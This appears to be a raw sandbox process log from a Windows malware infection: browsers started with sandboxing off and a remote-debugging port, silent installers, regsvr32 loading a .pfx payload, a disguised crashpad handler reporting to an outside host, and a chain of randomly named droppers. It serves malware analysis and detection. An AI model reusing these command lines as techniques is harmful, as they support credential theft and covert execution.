"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\0b2iq0et.4gr" --field-trial-handle=1852,i,8946347859565996325,877113634498623337,262144 --variations-seed-version --mojo-platform-channel-handle=1672 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\0b2iq0et.4gr" --field-trial-handle=2152,i,8946347859565996325,877113634498623337,262144 --variations-seed-version --mojo-platform-channel-handle=2316 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\0b2iq0et.4gr" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2896,i,8946347859565996325,877113634498623337,262144 --variations-seed-version --mojo-platform-channel-handle=2916 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\0b2iq0et.4gr" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2920,i,8946347859565996325,877113634498623337,262144 --variations-seed-version --mojo-platform-channel-handle=2944 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\0b2iq0et.4gr" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3264,i,8946347859565996325,877113634498623337,262144 --variations-seed-version --mojo-platform-channel-handle=3332 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\0b2iq0et.4gr" --extension-process --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3272,i,8946347859565996325,877113634498623337,262144 --variations-seed-version --mojo-platform-channel-handle=3376 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\0b2iq0et.4gr" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=3300,i,8946347859565996325,877113634498623337,262144 --variations-seed-version --mojo-platform-channel-handle=3416 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\0b2iq0et.4gr" --extension-process --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3344,i,8946347859565996325,877113634498623337,262144 --variations-seed-version --mojo-platform-channel-handle=2892 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\0b2iq0et.4gr" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3876,i,8946347859565996325,877113634498623337,262144 --variations-seed-version --mojo-platform-channel-handle=3796 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\0b2iq0et.4gr" --field-trial-handle=2876,i,8946347859565996325,877113634498623337,262144 --variations-seed-version --mojo-platform-channel-handle=2912 /prefetch:8

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Users\Admin\AppData\Local\Temp\10525030101\428f70aea8.exe

"C:\Users\Admin\AppData\Local\Temp\10525030101\428f70aea8.exe"

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --disable-fre --no-default-browser-check --no-first-run --no-sandbox --allow-no-sandbox-job --disable-gpu --mute-audio --disable-audio --user-data-dir="C:\Users\Admin\AppData\Local\Temp\qb0mcto0.veo"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\qb0mcto0.veo /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\qb0mcto0.veo\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x218,0x24c,0x7fff4a0af208,0x7fff4a0af214,0x7fff4a0af220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-sandbox --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\qb0mcto0.veo" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --always-read-main-dll --field-trial-handle=2516,i,16099084463691518555,13344630148050348942,262144 --variations-seed-version --mojo-platform-channel-handle=2512 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\qb0mcto0.veo" --always-read-main-dll --field-trial-handle=1856,i,16099084463691518555,13344630148050348942,262144 --variations-seed-version --mojo-platform-channel-handle=2520 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\qb0mcto0.veo" --always-read-main-dll --field-trial-handle=2092,i,16099084463691518555,13344630148050348942,262144 --variations-seed-version --mojo-platform-channel-handle=2536 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\qb0mcto0.veo" --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=2948,i,16099084463691518555,13344630148050348942,262144 --variations-seed-version --mojo-platform-channel-handle=3008 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\qb0mcto0.veo" --instant-process --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=2956,i,16099084463691518555,13344630148050348942,262144 --variations-seed-version --mojo-platform-channel-handle=1676 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\qb0mcto0.veo" --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=3156,i,16099084463691518555,13344630148050348942,262144 --variations-seed-version --mojo-platform-channel-handle=3184 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\qb0mcto0.veo" --extension-process --renderer-sub-type=extension --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=3204,i,16099084463691518555,13344630148050348942,262144 --variations-seed-version --mojo-platform-channel-handle=3188 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\qb0mcto0.veo" --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=3256,i,16099084463691518555,13344630148050348942,262144 --variations-seed-version --mojo-platform-channel-handle=3232 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\qb0mcto0.veo" --extension-process --renderer-sub-type=extension --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=3272,i,16099084463691518555,13344630148050348942,262144 --variations-seed-version --mojo-platform-channel-handle=3296 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\qb0mcto0.veo" --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=3316,i,16099084463691518555,13344630148050348942,262144 --variations-seed-version --mojo-platform-channel-handle=3324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\qb0mcto0.veo" --extension-process --renderer-sub-type=extension --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=3332,i,16099084463691518555,13344630148050348942,262144 --variations-seed-version --mojo-platform-channel-handle=3364 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\qb0mcto0.veo" --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=3388,i,16099084463691518555,13344630148050348942,262144 --variations-seed-version --mojo-platform-channel-handle=3436 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\qb0mcto0.veo" --extension-process --renderer-sub-type=extension --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=3428,i,16099084463691518555,13344630148050348942,262144 --variations-seed-version --mojo-platform-channel-handle=3508 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\qb0mcto0.veo" --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=3448,i,16099084463691518555,13344630148050348942,262144 --variations-seed-version --mojo-platform-channel-handle=3384 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\qb0mcto0.veo" --extension-process --renderer-sub-type=extension --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=3500,i,16099084463691518555,13344630148050348942,262144 --variations-seed-version --mojo-platform-channel-handle=3656 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10525040101\O1sOUoo.exe

"C:\Users\Admin\AppData\Local\Temp\10525040101\O1sOUoo.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\qb0mcto0.veo" --always-read-main-dll --field-trial-handle=4916,i,16099084463691518555,13344630148050348942,262144 --variations-seed-version --mojo-platform-channel-handle=4864 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\is-DQ39O.tmp\O1sOUoo.tmp

"C:\Users\Admin\AppData\Local\Temp\is-DQ39O.tmp\O1sOUoo.tmp" /SL5="$3024E,2446010,818176,C:\Users\Admin\AppData\Local\Temp\10525040101\O1sOUoo.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Users\Admin\AppData\Local\Temp\10525040101\O1sOUoo.exe

"C:\Users\Admin\AppData\Local\Temp\10525040101\O1sOUoo.exe" /VERYSILENT

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2f4,0x7fff4a0af208,0x7fff4a0af214,0x7fff4a0af220

C:\Users\Admin\AppData\Local\Temp\is-1ECSM.tmp\O1sOUoo.tmp

"C:\Users\Admin\AppData\Local\Temp\is-1ECSM.tmp\O1sOUoo.tmp" /SL5="$8003C,2446010,818176,C:\Users\Admin\AppData\Local\Temp\10525040101\O1sOUoo.exe" /VERYSILENT

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --subproc-heap-profiling --always-read-main-dll --field-trial-handle=1920,i,7406921985074181671,9708060278368275132,262144 --variations-seed-version --mojo-platform-channel-handle=2296 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --subproc-heap-profiling --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2268,i,7406921985074181671,9708060278368275132,262144 --variations-seed-version --mojo-platform-channel-handle=2264 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --subproc-heap-profiling --always-read-main-dll --field-trial-handle=2304,i,7406921985074181671,9708060278368275132,262144 --variations-seed-version --mojo-platform-channel-handle=2320 /prefetch:8

C:\Windows\system32\regsvr32.exe

"C:\Windows\Sysnative\regsvr32.exe" /s /i:googlechromebusiness.msi "C:\Users\Admin\AppData\Local\3MediumVioletRed_4.pfx"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --subproc-heap-profiling --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3460,i,7406921985074181671,9708060278368275132,262144 --variations-seed-version --mojo-platform-channel-handle=3488 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --subproc-heap-profiling --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3536,i,7406921985074181671,9708060278368275132,262144 --variations-seed-version --mojo-platform-channel-handle=3584 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"

C:\Users\Admin\AppData\Local\Temp\10525140101\sFFG7Wg.exe

"C:\Users\Admin\AppData\Local\Temp\10525140101\sFFG7Wg.exe"

C:\Users\Admin\AppData\Local\crashpad_handler.exe

C:\Users\Admin\AppData\Local\crashpad_handler.exe --no-rate-limit --no-upload-gzip --database=C:\Users\Admin\AppData\Local\crashpad_db --metrics-dir=C:\Users\Admin\AppData\Local\crashpad_metrics --url=https://mavakoti.org --annotation=dbgid=1 --annotation=prod=Client --annotation=ver=0.1.0 --initial-client-data=0x348,0x320,0x324,0x3a8,0x378,0x7b2f20,0x7b2ef8,0x7b2f04

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --always-read-main-dll --field-trial-handle=5196,i,7406921985074181671,9708060278368275132,262144 --variations-seed-version --mojo-platform-channel-handle=5148 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --always-read-main-dll --field-trial-handle=5240,i,7406921985074181671,9708060278368275132,262144 --variations-seed-version --mojo-platform-channel-handle=5268 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --always-read-main-dll --field-trial-handle=2936,i,7406921985074181671,9708060278368275132,262144 --variations-seed-version --mojo-platform-channel-handle=6016 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --always-read-main-dll --field-trial-handle=6360,i,7406921985074181671,9708060278368275132,262144 --variations-seed-version --mojo-platform-channel-handle=6384 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --always-read-main-dll --field-trial-handle=6360,i,7406921985074181671,9708060278368275132,262144 --variations-seed-version --mojo-platform-channel-handle=6384 /prefetch:8

C:\Windows\system32\regsvr32.EXE

C:\Windows\system32\regsvr32.EXE /s /i:googlechromebusiness.msi "\\?\C:\Users\Admin\AppData\Local\3MediumVioletRed_4.pfx"

C:\Users\Admin\AppData\Roaming\Patchfm\XPFix.exe

"C:\Users\Admin\AppData\Roaming\Patchfm\XPFix.exe" "C:\Users\Admin\AppData\Roaming\Patchfm\XPFix.exe" /u

C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe

C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe

C:\ProgramData\lxt00zm7y5.exe

"C:\ProgramData\lxt00zm7y5.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\ProgramData\gdbas2va1v.exe

"C:\ProgramData\gdbas2va1v.exe"

C:\ProgramData\pzukxlf37g.exe

"C:\ProgramData\pzukxlf37g.exe"

C:\Users\Admin\AppData\Local\Temp\YHNPKZDRXKX\UJLYNQ.exe

C:\Users\Admin\AppData\Local\Temp\YHNPKZDRXKX\UJLYNQ.exe

C:\Users\Admin\AppData\Local\Temp\EUDTULILGQF\EPJNTN.exe

C:\Users\Admin\AppData\Local\Temp\EUDTULILGQF\EPJNTN.exe 7036

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\EUDTULILGQF\EPJNTN.exe

C:\Users\Admin\AppData\Local\Temp\EUDTULILGQF\EPJNTN.exe

C:\Users\Admin\AppData\Local\Temp\EUDTULILGQF\EPJNTN.exe

C:\Users\Admin\AppData\Local\Temp\IWMFQQVZSJJ\YKIEPH.exe

C:\Users\Admin\AppData\Local\Temp\IWMFQQVZSJJ\YKIEPH.exe 5180

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\IWMFQQVZSJJ\YKIEPH.exe

C:\Users\Admin\AppData\Local\Temp\IWMFQQVZSJJ\YKIEPH.exe

C:\Users\Admin\AppData\Local\Temp\IWMFQQVZSJJ\YKIEPH.exe

C:\Users\Admin\AppData\Local\Temp\JPIWVOKNNNG\IKEYSH.exe

C:\Users\Admin\AppData\Local\Temp\JPIWVOKNNNG\IKEYSH.exe 6596

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\JPIWVOKNNNG\IKEYSH.exe

C:\Users\Admin\AppData\Local\Temp\JPIWVOKNNNG\IKEYSH.exe

C:\Users\Admin\AppData\Local\Temp\JPIWVOKNNNG\IKEYSH.exe

C:\Users\Admin\AppData\Local\Temp\IYIHEEUWQGQ\EQNSWE.exe

C:\Users\Admin\AppData\Local\Temp\IYIHEEUWQGQ\EQNSWE.exe 6984

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\IYIHEEUWQGQ\EQNSWE.exe

C:\Users\Admin\AppData\Local\Temp\IYIHEEUWQGQ\EQNSWE.exe

C:\Users\Admin\AppData\Local\Temp\IYIHEEUWQGQ\EQNSWE.exe

C:\Users\Admin\AppData\Local\Temp\ZEQDUMMYDHR\WPIWQX.exe

C:\Users\Admin\AppData\Local\Temp\ZEQDUMMYDHR\WPIWQX.exe 5752

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\ZEQDUMMYDHR\WPIWQX.exe

C:\Users\Admin\AppData\Local\Temp\ZEQDUMMYDHR\WPIWQX.exe

C:\Users\Admin\AppData\Local\Temp\ZEQDUMMYDHR\WPIWQX.exe

C:\Users\Admin\AppData\Local\Temp\MTHDZRZNPDL\MDLFKS.exe

C:\Users\Admin\AppData\Local\Temp\MTHDZRZNPDL\MDLFKS.exe 6452

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\MTHDZRZNPDL\MDLFKS.exe

C:\Users\Admin\AppData\Local\Temp\MTHDZRZNPDL\MDLFKS.exe

C:\Users\Admin\AppData\Local\Temp\MTHDZRZNPDL\MDLFKS.exe

C:\Users\Admin\AppData\Local\Temp\YIVTWFEQIGT\DGKZSU.exe

C:\Users\Admin\AppData\Local\Temp\YIVTWFEQIGT\DGKZSU.exe 4588

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\YIVTWFEQIGT\DGKZSU.exe

C:\Users\Admin\AppData\Local\Temp\YIVTWFEQIGT\DGKZSU.exe

C:\Users\Admin\AppData\Local\Temp\YIVTWFEQIGT\DGKZSU.exe

C:\Users\Admin\AppData\Local\Temp\EWRHLNWOXSP\ZSPPEK.exe

C:\Users\Admin\AppData\Local\Temp\EWRHLNWOXSP\ZSPPEK.exe 3932

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\EWRHLNWOXSP\ZSPPEK.exe

C:\Users\Admin\AppData\Local\Temp\EWRHLNWOXSP\ZSPPEK.exe

C:\Users\Admin\AppData\Local\Temp\EWRHLNWOXSP\ZSPPEK.exe

C:\Users\Admin\AppData\Local\Temp\HMTXFGYNWYT\JESSTG.exe

C:\Users\Admin\AppData\Local\Temp\HMTXFGYNWYT\JESSTG.exe 4376

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\HMTXFGYNWYT\JESSTG.exe

C:\Users\Admin\AppData\Local\Temp\HMTXFGYNWYT\JESSTG.exe

C:\Users\Admin\AppData\Local\Temp\HMTXFGYNWYT\JESSTG.exe

C:\Users\Admin\AppData\Local\Temp\KDLWHZDLFRU\VRIGQP.exe

C:\Users\Admin\AppData\Local\Temp\KDLWHZDLFRU\VRIGQP.exe 1732

